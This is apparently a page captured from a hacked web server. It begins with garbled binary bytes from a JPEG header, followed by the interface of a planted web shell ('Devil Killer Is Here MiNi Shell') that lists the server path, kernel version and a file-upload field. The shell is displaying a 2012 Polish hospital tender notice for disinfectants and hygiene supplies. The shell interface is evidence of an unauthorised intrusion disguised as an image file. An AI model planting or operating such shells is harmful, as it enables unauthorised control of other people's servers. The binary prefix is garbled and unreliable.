JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/6162-N-2012.html

<p class="kh_header"><b>Garwolin: Dostawa środków dezynfekcyjnych i higieniczno-sanitarnych dla Szpitala Mazowieckiego w Garwolinie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 6162 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Mazowiecki w Garwolinie Sp. z o.o. , Al. Legionów 11, 08-400 Garwolin, woj. mazowieckie, tel. 25 682 16 93, faks 25 684 32 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smwg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków dezynfekcyjnych i higieniczno-sanitarnych dla Szpitala Mazowieckiego w Garwolinie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa środków dezynfekcyjnych i higieniczno-sanitarnych dla Szpitala Mazowieckiego w Garwolinie Sp. z o.o. w okresie 24 miesięcy.
2. Zamawiający dopuszcza składanie ofert częściowych, gdzie zadanie (pakiet) stanowi:

Zadanie nr 1 - Mycie, dezynfekcja i pielęgnacja rąk, skóry i błon śluzowych;
Zadanie nr 2 - Dezynfekcja powierzchni trudnodostępnych i dużej powierzchni , sprzętu medycznego;
Zadanie nr 3 - Chemia gospodarcza;
Zadanie nr 4 - Artykuły sanitarno-higieniczne;
Zadanie nr 5 - Chusteczki alkoholowe i bezalkoholowe do dezynfekcji powierzchni.

Szczegółowy opis przedmiotu zamówienia zawarty jest w formularzu asortymentowo-cenowym (załącznik nr 2 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 33.74.11.00-7, 33.74.13.00-9, 33.77.10.00-5, 33.76.10.00-2, 33.76.30.00-6, 39.80.00.00-0, 39.81.11.00-1, 39.83.10.00-6, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3, 39.22.43.20-7, 34.92.84.80-6, 39.52.58.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień tj. koncesji, zezwolenie lub licencji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że oferowany towar wyrób posiada dokumenty dopuszczające jego stosowanie w służbie zdrowia na terenie Rzeczypospolitej Polskiej zgodnie z wymaganiami określonymi odpowiednio w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010r. Nr 107 poz. 679 z późn. zm.), ustawie z dnia 6 kwietnia 2001 r. Prawo Farmaceutyczne (Dz. U. z 2008 r. Nr 45, poz. 271 z późn. zm.), ustawie o produktach biobójczych (Dz. U. z 2007 r. Nr 39 poz. 252 z późn. zm.), ustawie z dnia 11 stycznia 2001 r. o substancjach i preparatach chemicznych (Dz. U. z 2009 r. Nr 152 poz. 1222 z późn. zm. oraz ustawie z dnia 30 marca 2001 r. o kosmetykach (Dz. U. z 2001 r. Nr 42 poz. 473 z późn. zm.) i na każde żądanie Zamawiającego przedstawi w/w dokumenty w wyznaczonym przez niego terminie</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz OFERTA - załącznik nr 1 do SIWZ.
2. Wypełniony formularz asortymentowo-cenowy - załącznik nr 2 do SIWZ.
3. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 3 do SIWZ.
4. Oświadczenie Wykonawcy o braku podstaw do wykluczenia - załącznik nr 4 do SIWZ.
5. W przypadku osób fizycznych składających oświadczenie z zakresu art. 24 ust. 1 pkt 2 ustawy, oświadczenie Wykonawcy wskazujące osobę upoważnioną w do występowania i składania oferty w jej imieniu. - wzór stanowi załącznik nr 5 do SIWZ.
6. Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę.
7. Wykaz podwykonawców - załącznik nr 6 do SIWZ.
8. Parafowany na każdej stronie formularz umowy - załącznik nr 7 do SIWZ
9. Oświadczenie, że oferowany towar wyrób posiada dokumenty dopuszczające jego stosowanie w służbie zdrowia na terenie Rzeczypospolitej Polskiej - załącznik nr 8 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany umowy w następujących przypadkach:
- zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
- zmian stawek celnych wprowadzonych decyzjami odnośnych władz,
- zmiany adresu siedziby Wykonawcy lub Zamawiającego,
- zmiany nazwy Wykonawcy,
- zmiany osób reprezentujących strony,
- zmiany przepisów prawnych mających wpływ na treść niniejszej umowy,
- zmiany producenta oferowanego asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smwg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego: Szpital Mazowiecki w Garwolinie Sp. z o.o. ul. Al. Legionów 11 08-400 Garwolin - Sekretariat, budynek administracyjno-leczniczy, piętro drugie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2012 godzina 14:00, miejsce: Szpital Mazowiecki w Garwolinie Sp. z o.o. ul. Al. Legionów 11 08-400 Garwolin - Sekretariat, budynek administracyjno-leczniczy, piętro drugie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mycie, dezynfekcja i pielęgnacja rąk, skóry i błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Mycie rąk - Delikatna płynna emulsja myjąca z dodatkami antybakteryjnymi do codziennego mycia rąk. Substancje czynne: chlorohexidine, tenzydy, O-phenylophenol, posiadająca opinię PZH.		
	500ml	300	op.
	5l	125	op.
2 Dezynfekcja rąk - Preparat do chirurgicznej i higienicznej dezynfekcji rąk na bazie etanolu, izopropanolu z dodatkiem gliceryny oraz substancji zmiękczających. Postać żel. Spektrum działania B, (MRSA), HCV, ROTA do 30 sekund, POLIO, ADENO, M. TUBERCULOSIS, AVIUM do 2 minut. Opakowanie przystosowane do dozowników łokciowych.		
	500ml	400	op.
3 Pielęgnacja rąk - Delikatny balsam do regeneracji skóry rąk. Chroniący skórę narażoną na częste wysuszanie, działający prewencyjnie przeciwko tworzeniu mikrouszkodzeń, przeciwdziałający utlenianiu naskórka. Oparty na bazie czystego białego oleju (paraffinum Liguidum). Posiadający świadectwo Rejestracji Instytutu Medycyny Pracy.		
	500ml	60	op.
4 Dezynfekcja skóry przed zabiegami inwazyjnymi - Gotowy do użycia alkoholowy roztwór do dezynfekcji skóry przed zabiegami chirurgicznymi, przed wkłuciami. Aktywny przeciwko bakteriom (MRSA, Mycobacteria), grzybom, wirusom (HBV, HIV, HCV, Vaccina, Rota, Polio). Dobrze tolerowany przez skórę. Substancje czynne: etanol i 2-propanol. Opakowanie 250 ml ze spryskiwaczem.		
	250ml	60	op.
5 Dezynfekcja błon śluzowych - Gotowy do użycia roztwór do dezynfekcji błon śluzowych i ran na bazie powidonu jodu. Spektrum działania B (MRSA, Mycobacteria), F, V, S, pierwotniakom. Czas działania do 15 sekund. Opakowanie 250 ml ze spryskiwaczem. 		
	250ml	15	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dezynfekcja powierzchni trudnodostępnych i dużej powierzchni , sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Dezynfekcja powierzcni trudnodostępnych - Preparat do dezynfekcji małych powierzchni czystych, na bazie alkoholi i czwartorzędowych soli amoniowych, nie zawierający aldehydów, gotowy do użycia. Spektrum działania: B, F, MRSA, V, (HIV, HBV, HCV, Vaccina, Rota), Tbc w 30 sekund, V (Polio, Adeno) do 1 minuty. Kliniczna opinia o możliwości stosowania na odziałach pediatrycznych.		
	1l	200	op.
2 Dezynfekcja sprzętu medycznego - Preparat w postaci koncentratu na bazie czwartorzędowych związków amonowych do dezynfekcji narzędzi  i powierzchni, posiadający szerokie spektrum działania: B, F, MRSA, V (HIV, HBV, BVDV, Vaccinia), Mycobacterium terrae, działający w stężeniu 0,5% i czasie 15 minut. Preparat z wbudowanym systemem dozującym.                                		
	1l	60	op.
3 Dezynfekcja dużych powierzchni - Skoncentrowany preparat dezynfekcyjno-myjący na bazie podchlorynu sodu posiadający szerokie spektrum działania: B-w tym TBC, F, V /polio, adeno/ max-15 min, Spory - 1 godz. - niskie stężenie użytkowe roztworu roboczego do dużych powierzcni czystych i zanieczyszczonych organicznie.		
	1l	350	op.
4 Dezynfekcja dużych powierzchni - Preparat w postaci tabletek dezynfekcyjnych na bazie aktywnego chloru. Masa tabletki min. 3,3g.		
	1kg	140	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Chemia gospodarcza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Preparat do dezynfekcji toalet na bazie podchlorynu sodu. Działanie: bakterie, wirusy. Usuwa nieprzyjemne zapachy. 		
	750ml	1150	op.
2 Gotowy do użycia preparat na bazie podchlorynu sodu do natychmiastowej likwidacji pleśni i grzybów. Preparat posiadający wysokie właściwości bakteriobójcze, odświeżający powierzchnie.		
	500ml	100	op.
3 Preparat do utrzymania czystości na powierzchniach kuchennych, doskonale usuwający tłuszcz i brud, pozostawiający wyrazisty przyjemny zapach. Możliwość stosowania w postaci pianki. Przeznaczony do wszelkich zmywalnych powierzchni w w kuchni - blaty kuchenne, płytki ceramiczne, powierzchnie szklane, plastikowe i nierdzewne.		
	500ml	250	op.
4 Preparat w postaci mleczka, o właściwościach abrazyjnych. Bez zawartości chloru. Przeznaczony do czyszczenia szkliwa, marmuru, stali nierdzewnej i powierzchni ceramicznych. Zawierający składnik antybakteryjny i przyjemny, odświeżający zapach.		
	600g	260	op.
5 Preparat o działaniu antybakteryjnym przeznaczony do mycia łazienek, bez zawartości chloru. Skutecznie usuwający rdzę, kamień wodny, brud i resztki mydła na płytkach ceramicznych, powierzchniach akrylowych i bateriach łazienkowych. Preparat gotowy do użycia z systemem spryskującym		
	500ml	960	op.
6 Płyn przeznaczony do ręcznego mycia naczyń szklanych, luster, kryształów, laminatów oraz powierzchni ceramicznych. Nie zawierający fosforanów, Ph neutralne, łagodny dla rąk, wydajny		
	10l	150	op.
7 Preparat do odświeżania powietrza w aerozolu, który neutralizuje nieprzyjemne zapachy w pomieszczeniach. W różnych wersjach zapachowych.		
	500ml	150	op.
8 Preparat przeznaczony do mycia okien, luster i wszelkich powierzchni szklanych. Zawierający związki powierzchniowo czynne oraz rozpuszczalniki doskonale mieszające się z wodą. Szybko i łatwo usuwający odciski palców i ślady tłuszczu z powierzchni szklanych bez konieczności długotrwałego polerowania.		
	750ml	750	op.
9 Neutralny środek do czyszczenia i nabłyszczania wodoodpornych podłóg o przyjemnym zapachu, o neutralnym Ph		
	1l	1000	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.20.00-3, 39.83.16.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły sanitarno-higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Papier toaletowy mała rolka 2 warstwowy, surowiec celuloza, gramatura 2 x 20 g/mkw, min. 230 listków, długość listka min. 10,50 cm, długość rolki min. 24mb		
	rolka	12000	szt.
2 Ręcznik papierowy dwuwarstwowy do podajnika, centralnego dozowania, surowiec celuloza, wodoutrwalony, gramatura 2 x 18 g/mkw, wymiar rolki min. 119 x 20 cm, długość min. 130 mb		
		8000	szt.
3 Ręcznik papierowy typu zz jednowarstwowy, wymiary listka min. 25 x 23 - min. 200 listków		
		5000	op.
4 Ściereczki z mikrofazy min. 33/33 cm, materiał 205, polyamid 205 i poliester 80%, temperatura prania do 60 stopni, kolor zielony, niebieski, czerwony, żółty		
		2300	szt.
5 Gąbka z padem		
		5000	szt.
6 Mop bawełna min. 40x15, system mocowania typu kieszeniowy		
		900	szt.
7 Worki na odpady, nieprzezroczyste, wytrzymałe, pojemność 35 l (50x60 cm), kolor czarne i czerwone (op. po 50 szt.)		
	50szt	1000	op.
8 Worki na odpady, nieprzezroczyste, wytrzymałe, pojemność 120 l (70x107 cm), kolor czarne (op. po 50 szt.)		
	50szt	100	op.
9 Worki na odpady, nieprzezroczyste, wytrzymałe, pojemność 60 l (60x76 cm), kolor czarny, czerwony, biały (op. po 50 szt.) - czerwone 50 szt. - 140 op.; czarne 50 szt. - 140 op.; białe 50 szt. - 48 op.		
	50szt	328 (w oznaczonych kolorach	op.
10 Worki na odpady, nieprzezroczyste, wytrzymałe, pojemność 160 l (90x100 cm), op. po 50 szt.). Kolor czarne, grubość +/-18-22 mikrony		
	50szt	145	op.
11 Uniwersalny środek piorąco-dezynfekujący do prania i chemiczno-termicznej dezynfekcji bielizny, wybielający, nie niszczący włókien tkanin, do stosowania we wszystkich zakresach twardości wody. W swoim składzie produkt powinien zawierać anionowe związki powierzchniowo czynne, wybielacze na bazie aktywnego tlenu, niejonowe związki powierzchniowo czynne, mydło, fosfoniany, polikarboksylany, zeolity, wartość pH 1% roztworu w wodzie 10-11. Opakowanie ekonomiczne 15 kg 		
	15kg	14	op.
12 Płyn do udrażniania syfonów i rur kanalizacyjnych oraz kratek ściekowych wykonanych z tworzyw sztucznych, stali, żeliwa, betonu i ceramiki. Emulguje i hydrolizuje tłuszcze, białka i inne złogi organiczne, powodując ich wypłukiwanie z oczyszczonych przewodów.		
	0,8kg	15	op.
13 Kostka WC koszyk	440	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.10.00-5, 39.52.58.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Chusteczki alkoholowe i bezalkoholowe do dezynfekcji powierzchni.</p>
